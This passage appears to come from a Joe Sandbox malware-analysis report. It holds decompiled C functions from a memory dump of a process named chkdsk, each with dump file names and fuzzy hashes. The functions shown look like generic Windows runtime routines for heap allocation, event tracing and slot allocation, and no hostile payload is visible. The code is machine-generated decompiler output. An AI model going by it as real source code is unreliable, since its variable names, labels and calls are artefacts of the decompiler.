                                                      				_t77 =  *((intOrPtr*)(_t83 + 8));
                                                      				_t68 = E04DBA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                                      				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                                      				if(_t68 < 0) {
                                                      					goto L14;
                                                      				}
                                                      				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                                      				goto L6;
                                                      			}



















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a0478de16fa2a77ba03eae1217c620e60717946fdcd9b808b0bafc396c11d63
                                                      • Instruction ID: 9bf6aab73e9f0eaebc8f35ec9ed7f9d1ada677b114aed789611c69b5526a6d81
                                                      • Opcode Fuzzy Hash: 3a0478de16fa2a77ba03eae1217c620e60717946fdcd9b808b0bafc396c11d63
                                                      • Instruction Fuzzy Hash: B34149B5A10215DFDB25CF58C890BA9BBF2FB49314F1580AAE945AB344D774BD01CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E04E07016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                      				signed int _v8;
                                                      				char _v588;
                                                      				intOrPtr _v592;
                                                      				intOrPtr _v596;
                                                      				signed short* _v600;
                                                      				char _v604;
                                                      				short _v606;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed short* _t55;
                                                      				void* _t56;
                                                      				signed short* _t58;
                                                      				signed char* _t61;
                                                      				char* _t68;
                                                      				void* _t69;
                                                      				void* _t71;
                                                      				void* _t72;
                                                      				signed int _t75;
                                                      
                                                      				_t64 = __edx;
                                                      				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                      				_v8 =  *0x4e7d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                      				_t55 = _a16;
                                                      				_v606 = __ecx;
                                                      				_t71 = 0;
                                                      				_t58 = _a12;
                                                      				_v596 = __edx;
                                                      				_v600 = _t58;
                                                      				_t68 =  &_v588;
                                                      				if(_t58 != 0) {
                                                      					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                      					if(_t55 != 0) {
                                                      						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                      					}
                                                      				}
                                                      				_t8 = _t71 + 0x2a; // 0x28
                                                      				_t33 = _t8;
                                                      				_v592 = _t8;
                                                      				if(_t71 <= 0x214) {
                                                      					L6:
                                                      					 *((short*)(_t68 + 6)) = _v606;
                                                      					if(_t64 != 0xffffffff) {
                                                      						asm("cdq");
                                                      						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                      						 *((char*)(_t68 + 0x28)) = _a4;
                                                      						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                      						 *((char*)(_t68 + 0x29)) = _a8;
                                                      						if(_t71 != 0) {
                                                      							_t22 = _t68 + 0x2a; // 0x2a
                                                      							_t64 = _t22;
                                                      							E04E06B4C(_t58, _t22, _t71,  &_v604);
                                                      							if(_t55 != 0) {
                                                      								_t25 = _v604 + 0x2a; // 0x2a
                                                      								_t64 = _t25 + _t68;
                                                      								E04E06B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                      							}
                                                      							if(E04DA7D50() == 0) {
                                                      								_t61 = 0x7ffe0384;
                                                      							} else {
                                                      								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                      							}
                                                      							_push(_t68);
                                                      							_push(_v592 + 0xffffffe0);
                                                      							_push(0x402);
                                                      							_push( *_t61 & 0x000000ff);
                                                      							E04DC9AE0();
                                                      						}
                                                      					}
                                                      					_t35 =  &_v588;
                                                      					if( &_v588 != _t68) {
                                                      						_t35 = L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                      					}
                                                      					L16:
                                                      					_pop(_t69);
                                                      					_pop(_t72);
                                                      					_pop(_t56);
                                                      					return E04DCB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                      				}
                                                      				_t68 = L04DA4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                      				if(_t68 == 0) {
                                                      					goto L16;
                                                      				} else {
                                                      					_t58 = _v600;
                                                      					_t64 = _v596;
                                                      					goto L6;
                                                      				}
                                                      			}























                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 757509e50ea496f7f0b58964677bd1aa3fd6451e64b7fabb4c404cc30f592dc4
                                                      • Instruction ID: 4a31ff6a3d966eba74789722c34cca07cb06db729fccaad49277356d8bf9143c
                                                      • Opcode Fuzzy Hash: 757509e50ea496f7f0b58964677bd1aa3fd6451e64b7fabb4c404cc30f592dc4
                                                      • Instruction Fuzzy Hash: A331A4726047919BC320DF68C940A6AB7E9FF88704F048A2DF8A5976D0E770F954CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 68%
                                                      			E04DAC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                      				signed int* _v8;
                                                      				char _v16;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				signed char _t33;
                                                      				signed char _t43;
                                                      				signed char _t48;
                                                      				signed char _t62;
                                                      				void* _t63;
                                                      				intOrPtr _t69;
                                                      				intOrPtr _t71;
                                                      				unsigned int* _t82;
                                                      				void* _t83;
                                                      
                                                      				_t80 = __ecx;
                                                      				_t82 = __edx;
                                                      				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                      				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                      				if((_t33 & 0x00000001) != 0) {
                                                      					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                      					if(E04DA7D50() != 0) {
                                                      						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                      					} else {
                                                      						_t43 = 0x7ffe0386;
                                                      					}
                                                      					if( *_t43 != 0) {
                                                      						_t43 = E04E58D34(_v8, _t80);
                                                      					}
                                                      					E04DA2280(_t43, _t82);
                                                      					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                      						E04D9FFB0(_t62, _t80, _t82);
                                                      						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                      						_t30 = _t80 + 0xd0; // 0xd0
                                                      						_t83 = _t30;
                                                      						E04E58833(_t83,  &_v16);
                                                      						_t81 = _t80 + 0x90;
                                                      						E04D9FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                      						_t63 = 0;
                                                      						_push(0);
                                                      						_push(_t83);
                                                      						_t48 = E04DCB180();
                                                      						if(_a4 != 0) {
                                                      							E04DA2280(_t48, _t81);
                                                      						}
                                                      					} else {
                                                      						_t69 = _v8;
                                                      						_t12 = _t80 + 0x98; // 0x98
                                                      						_t13 = _t69 + 0xc; // 0x575651ff
                                                      						E04DABB2D(_t13, _t12);
                                                      						_t71 = _v8;
                                                      						_t15 = _t80 + 0xb0; // 0xb0
                                                      						_t16 = _t71 + 8; // 0x8b000cc2
                                                      						E04DABB2D(_t16, _t15);
                                                      						E04DAB944(_v8, _t62);
                                                      						 *((char*)(_t80 + 0xdc)) = 0;
                                                      						E04D9FFB0(0, _t80, _t82);
                                                      						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                      						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                      						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                      						 *(_t80 + 0xde) = 0;
                                                      						if(_a4 == 0) {
                                                      							_t25 = _t80 + 0x90; // 0x90
                                                      							E04D9FFB0(0, _t80, _t25);
                                                      						}
                                                      						_t63 = 1;
                                                      					}
                                                      					return _t63;
                                                      				}
                                                      				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                      				if(_a4 == 0) {
                                                      					_t24 = _t80 + 0x90; // 0x90
                                                      					E04D9FFB0(0, __ecx, _t24);
                                                      				}
                                                      				return 0;
                                                      			}

















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                      • Instruction ID: 63cbdc01dad62276913bf7d6570cd5da3bf8f92f765854b919c5e613a1bcba97
                                                      • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                      • Instruction Fuzzy Hash: 72310672B0154AAEEB04EFB5C880BE9F794FF42218F04415AD51C87241DB39BA6AD7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E04DBA70E(intOrPtr* __ecx, char* __edx) {
                                                      				unsigned int _v8;
                                                      				intOrPtr* _v12;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* _t16;
                                                      				intOrPtr _t17;
                                                      				intOrPtr _t28;
                                                      				char* _t33;
                                                      				intOrPtr _t37;
                                                      				intOrPtr _t38;
                                                      				void* _t50;
                                                      				intOrPtr _t52;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_t52 =  *0x4e77b10; // 0x8
                                                      				_t33 = __edx;
                                                      				_t48 = __ecx;
                                                      				_v12 = __ecx;
                                                      				if(_t52 == 0) {
                                                      					 *0x4e77b10 = 8;
                                                      					 *0x4e77b14 = 0x4e77b0c;
                                                      					 *0x4e77b18 = 1;
                                                      					L6:
                                                      					_t2 = _t52 + 1; // 0x9
                                                      					E04DBA990(0x4e77b10, _t2, 7);
                                                      					asm("bts ecx, eax");
                                                      					 *_t48 = _t52;
                                                      					 *_t33 = 1;
                                                      					L3:
                                                      					_t16 = 0;
                                                      					L4:
                                                      					return _t16;
                                                      				}
                                                      				_t17 = L04DBA840(__edx, __ecx, __ecx, _t52, 0x4e77b10, 1, 0);
                                                      				if(_t17 == 0xffffffff) {
                                                      					_t37 =  *0x4e77b10; // 0x8
                                                      					_t3 = _t37 + 0x27; // 0x2f
                                                      					__eflags = _t3 >> 5 -  *0x4e77b18; // 0x1
                                                      					if(__eflags > 0) {
                                                      						_t38 =  *0x4e77b9c; // 0x0
                                                      						_t4 = _t52 + 0x27; // 0x2f
                                                      						_v8 = _t4 >> 5;
                                                      						_t50 = L04DA4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                                      						__eflags = _t50;
                                                      						if(_t50 == 0) {
                                                      							_t16 = 0xc0000017;
                                                      							goto L4;
                                                      						}
                                                      						 *0x4e77b18 = _v8;
                                                      						_t8 = _t52 + 7; // 0xf
                                                      						E04DCF3E0(_t50,  *0x4e77b14, _t8 >> 3);
                                                      						_t28 =  *0x4e77b14; // 0x776f7b0c
                                                      						__eflags = _t28 - 0x4e77b0c;
                                                      						if(_t28 != 0x4e77b0c) {
                                                      							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                      						}
                                                      						_t9 = _t52 + 8; // 0x10
                                                      						 *0x4e77b14 = _t50;
                                                      						_t48 = _v12;
                                                      						 *0x4e77b10 = _t9;
                                                      						goto L6;
                                                      					}
                                                      					 *0x4e77b10 = _t37 + 8;
                                                      					goto L6;
                                                      				}
                                                      				 *__ecx = _t17;
                                                      				 *_t33 = 0;
                                                      				goto L3;
                                                      			}

















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0c48b093bcaf52d70b6167be28e4e007e13e12e6c546266db06fd82a0f18a3c0
                                                      • Instruction ID: 995ba77dbf90e80f6d67fd7d11ecb9db2020dc268479bab5fe5b85c2addc6c2b
                                                      • Opcode Fuzzy Hash: 0c48b093bcaf52d70b6167be28e4e007e13e12e6c546266db06fd82a0f18a3c0
                                                      • Instruction Fuzzy Hash: FD31ACB1704201EBD711CB19E880FA977FAFB84721F14099AE48687344E778BD01CBE2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 97%
                                                      			E04DB61A0(signed int* __ecx) {
                                                      				intOrPtr _v8;
                                                      				char _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t30;
                                                      				intOrPtr _t31;
                                                      				void* _t32;
                                                      				intOrPtr _t33;
                                                      				intOrPtr _t37;
                                                      				intOrPtr _t49;
                                                      				signed int _t51;
                                                      				intOrPtr _t52;
                                                      				signed int _t54;
                                                      				void* _t59;
                                                      				signed int* _t61;
                                                      				intOrPtr* _t64;
                                                      
                                                      				_t61 = __ecx;
                                                      				_v12 = 0;
                                                      				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                      				_v16 = __ecx;
                                                      				_v8 = 0;
                                                      				if(_t30 == 0) {
                                                      					L6:
                                                      					_t31 = 0;
                                                      					L7:
                                                      					return _t31;
                                                      				}
                                                      				_t32 = _t30 + 0x5d8;
                                                      				if(_t32 == 0) {
                                                      					goto L6;
                                                      				}
                                                      				_t59 = _t32 + 0x30;
                                                      				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                                      					goto L6;
                                                      				}
                                                      				if(__ecx != 0) {
                                                      					 *((intOrPtr*)(__ecx)) = 0;
                                                      					 *((intOrPtr*)(__ecx + 4)) = 0;
                                                      				}
                                                      				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                                      					_t51 =  *(_t32 + 0x10);
                                                      					_t33 = _t32 + 0x10;
                                                      					_v20 = _t33;
                                                      					_t54 =  *(_t33 + 4);
                                                      					if((_t51 | _t54) == 0) {
                                                      						_t37 = E04DB5E50(0x4d667cc, 0, 0,  &_v12);
                                                      						if(_t37 != 0) {
                                                      							goto L6;
                                                      						}
                                                      						_t52 = _v8;
                                                      						asm("lock cmpxchg8b [esi]");
                                                      						_t64 = _v16;
                                                      						_t49 = _t37;
                                                      						_v20 = 0;
                                                      						if(_t37 == 0) {
                                                      							if(_t64 != 0) {
                                                      								 *_t64 = _v12;
                                                      								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                                      							}
                                                      							E04E59D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                                      							_t31 = 1;
                                                      							goto L7;
                                                      						}
                                                      						E04D8F7C0(_t52, _v12, _t52, 0);
                                                      						if(_t64 != 0) {
                                                      							 *_t64 = _t49;
                                                      							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                                      						}
                                                      						L12:
                                                      						_t31 = 1;
                                                      						goto L7;
                                                      					}
                                                      					if(_t61 != 0) {
                                                      						 *_t61 = _t51;
                                                      						_t61[1] = _t54;
                                                      					}
                                                      					goto L12;
                                                      				} else {
                                                      					goto L6;
                                                      				}
                                                      			}




















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a09dea2038fbeeec0ec3c604ca1fc8961cf2daec48df4f938cfb766cc550c7e7
                                                      • Instruction ID: 831a5a3a76b88dc12bf48f4cf69d038a5bec6b465e907d9613db7daafc9606dc
                                                      • Opcode Fuzzy Hash: a09dea2038fbeeec0ec3c604ca1fc8961cf2daec48df4f938cfb766cc550c7e7
                                                      • Instruction Fuzzy Hash: 76318D71A05301DFE360DF19C800BA6B7E5FB88B00F05496DE9999B351E7B0F804CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E04D8AA16(signed short* __ecx) {
                                                      				signed int _v8;
                                                      				intOrPtr _v12;
                                                      				signed short _v16;
                                                      				intOrPtr _v20;
                                                      				signed short _v24;
                                                      				signed short _v28;
                                                      				void* _v32;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				intOrPtr _t25;
                                                      				signed short _t38;
                                                      				signed short* _t42;
                                                      				signed int _t44;
                                                      				signed short* _t52;
                                                      				signed short _t53;
                                                      				signed int _t54;
                                                      
                                                      				_v8 =  *0x4e7d360 ^ _t54;
                                                      				_t42 = __ecx;
                                                      				_t44 =  *__ecx & 0x0000ffff;
                                                      				_t52 =  &(__ecx[2]);
                                                      				_t51 = _t44 + 2;
                                                      				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                                      					L4:
                                                      					_t25 =  *0x4e77b9c; // 0x0
                                                      					_t53 = L04DA4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                                      					__eflags = _t53;
                                                      					if(_t53 == 0) {
                                                      						L3:
                                                      						return E04DCB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                                      					} else {
                                                      						E04DCF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                                      						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                                      						L2:
                                                      						_t51 = 4;
                                                      						if(L04D96C59(_t53, _t51, _t58) != 0) {
                                                      							_t28 = E04DB5E50(0x4d6c338, 0, 0,  &_v32);
                                                      							__eflags = _t28;
                                                      							if(_t28 == 0) {
                                                      								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                                      								__eflags = _t38;
                                                      								_v24 = _t53;
                                                      								_v16 = _t38;
                                                      								_v20 = 0;
                                                      								_v12 = 0;
                                                      								E04DBB230(_v32, _v28, 0x4d6c2d8, 1,  &_v24);
                                                      								_t28 = E04D8F7A0(_v32, _v28);
                                                      							}
                                                      							__eflags = _t53 -  *_t52;
                                                      							if(_t53 !=  *_t52) {
                                                      								_t28 = L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                      							}
                                                      						}
                                                      						goto L3;
                                                      					}
                                                      				}
                                                      				_t53 =  *_t52;
                                                      				_t44 = _t44 >> 1;
                                                      				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                                      				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                                      					goto L4;
                                                      				}
                                                      				goto L2;
                                                      			}





















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a3b263e064067ed5d946a379865f25c6166aadd4d707c59929e0c68da3be419
                                                      • Instruction ID: b98c7df98e8e5bf19d2a463d89be6928ce4b96be1af4eaeb1325a87b52c369e1
                                                      • Opcode Fuzzy Hash: 3a3b263e064067ed5d946a379865f25c6166aadd4d707c59929e0c68da3be419
                                                      • Instruction Fuzzy Hash: 53319F71A00219ABDB11AF65CD41ABEB7B9FF04704B01406AF941EB250E778BD11DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E04DC8EC7(void* __ecx, void* __edx) {
                                                      				signed int _v8;
                                                      				signed int* _v16;
                                                      				intOrPtr _v20;
                                                      				signed int* _v24;
                                                      				char* _v28;
                                                      				signed int* _v32;
                                                      				intOrPtr _v36;
                                                      				signed int* _v40;
                                                      				signed int* _v44;
                                                      				signed int* _v48;
                                                      				intOrPtr _v52;
                                                      				signed int* _v56;
                                                      				signed int* _v60;
                                                      				signed int* _v64;
                                                      				intOrPtr _v68;
                                                      				signed int* _v72;
                                                      				char* _v76;
                                                      				signed int* _v80;
                                                      				signed int _v84;
                                                      				signed int* _v88;
                                                      				intOrPtr _v92;
                                                      				signed int* _v96;
                                                      				intOrPtr _v100;
                                                      				signed int* _v104;
                                                      				signed int* _v108;
                                                      				char _v140;
                                                      				signed int _v144;
                                                      				signed int _v148;
                                                      				signed int* _v152;
                                                      				char _v156;
                                                      				signed int* _v160;
                                                      				char _v164;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* _t67;
                                                      				intOrPtr _t70;
                                                      				void* _t71;
                                                      				void* _t72;
                                                      				signed int _t73;
                                                      
                                                      				_t69 = __edx;
                                                      				_v8 =  *0x4e7d360 ^ _t73;
                                                      				_t48 =  *[fs:0x30];
                                                      				_t72 = __edx;
                                                      				_t71 = __ecx;
                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                                      					_t48 = E04DB4E70(0x4e786e4, 0x4dc9490, 0, 0);
                                                      					if( *0x4e753e8 > 5 && E04DC8F33(0x4e753e8, 0, 0x2000) != 0) {
                                                      						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                                      						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                                      						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                                      						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                                      						_v108 =  &_v84;
                                                      						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                                      						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                                      						_v76 =  &_v156;
                                                      						_t70 = 8;
                                                      						_v60 =  &_v144;
                                                      						_t67 = 4;
                                                      						_v44 =  &_v148;
                                                      						_v152 = 0;
                                                      						_v160 = 0;
                                                      						_v104 = 0;
                                                      						_v100 = 2;
                                                      						_v96 = 0;
                                                      						_v88 = 0;
                                                      						_v80 = 0;
                                                      						_v72 = 0;
                                                      						_v68 = _t70;
                                                      						_v64 = 0;
                                                      						_v56 = 0;
                                                      						_v52 = 0x4e753e8;
                                                      						_v48 = 0;
                                                      						_v40 = 0;
                                                      						_v36 = 0x4e753e8;
                                                      						_v32 = 0;
                                                      						_v28 =  &_v164;
                                                      						_v24 = 0;
                                                      						_v20 = _t70;
                                                      						_v16 = 0;
                                                      						_t69 = 0x4d6bc46;
                                                      						_t48 = E04E07B9C(0x4e753e8, 0x4d6bc46, _t67, 0x4e753e8, _t70,  &_v140);
                                                      					}
                                                      				}
                                                      				return E04DCB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e3b021f69292121dd8d78427446054bcc99df7d09398686a5c41b5cb7e31d656
                                                      • Instruction ID: 78f0504fda2c128a8f42661b8716e57ef8e1cd4b2904cf53c670ebee97d0efbc
                                                      • Opcode Fuzzy Hash: e3b021f69292121dd8d78427446054bcc99df7d09398686a5c41b5cb7e31d656
                                                      • Instruction Fuzzy Hash: 3441B2B1D00219AFDB10CFAAD981AADFBF4FB48314F5041AEE549A7240D774AA84CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E04DC4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                      				signed int _v8;
                                                      				signed int* _v12;
                                                      				char _v13;
                                                      				signed int _v16;
                                                      				char _v21;
                                                      				signed int* _v24;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t29;
                                                      				signed int* _t32;
                                                      				signed int* _t41;
                                                      				signed int _t42;
                                                      				void* _t43;
                                                      				intOrPtr* _t51;
                                                      				void* _t52;
                                                      				signed int _t53;
                                                      				signed int _t58;
                                                      				void* _t59;
                                                      				signed int _t60;
                                                      				signed int _t62;
                                                      
                                                      				_t49 = __edx;
                                                      				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                                      				_t26 =  *0x4e7d360 ^ _t62;
                                                      				_v8 =  *0x4e7d360 ^ _t62;
                                                      				_t41 = __ecx;
                                                      				_t51 = __edx;
                                                      				_v12 = __ecx;
                                                      				if(_a4 == 0) {
                                                      					if(_a8 != 0) {
                                                      						goto L1;
                                                      					}
                                                      					_v13 = 1;
                                                      					E04DA2280(_t26, 0x4e78608);
                                                      					_t58 =  *_t41;
                                                      					if(_t58 == 0) {
                                                      						L11:
                                                      						E04D9FFB0(_t41, _t51, 0x4e78608);
                                                      						L2:
                                                      						 *0x4e7b1e0(_a4, _a8);
                                                      						_t42 =  *_t51();
                                                      						if(_t42 == 0) {
                                                      							_t29 = 0;
                                                      							L5:
                                                      							_pop(_t52);
                                                      							_pop(_t59);
                                                      							_pop(_t43);
                                                      							return E04DCB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                                      						}
                                                      						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                                      						if(_v21 != 0) {
                                                      							_t53 = 0;
                                                      							E04DA2280(_t28, 0x4e78608);
                                                      							_t32 = _v24;
                                                      							if( *_t32 == _t58) {
                                                      								 *_t32 = _t42;
                                                      								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                                      								if(_t58 != 0) {
                                                      									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                                      									asm("sbb edi, edi");
                                                      									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                                      								}
                                                      							}
                                                      							E04D9FFB0(_t42, _t53, 0x4e78608);
                                                      							if(_t53 != 0) {
                                                      								L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                      							}
                                                      						}
                                                      						_t29 = _t42;
                                                      						goto L5;
                                                      					}
                                                      					if( *((char*)(_t58 + 0x40)) != 0) {
                                                      						L10:
                                                      						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                                      						E04D9FFB0(_t41, _t51, 0x4e78608);
                                                      						_t29 = _t58;
                                                      						goto L5;
                                                      					}
                                                      					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                      					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                      						goto L11;
                                                      					}
                                                      					goto L10;
                                                      				}
                                                      				L1:
                                                      				_v13 = 0;
                                                      				_t58 = 0;
                                                      				goto L2;
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
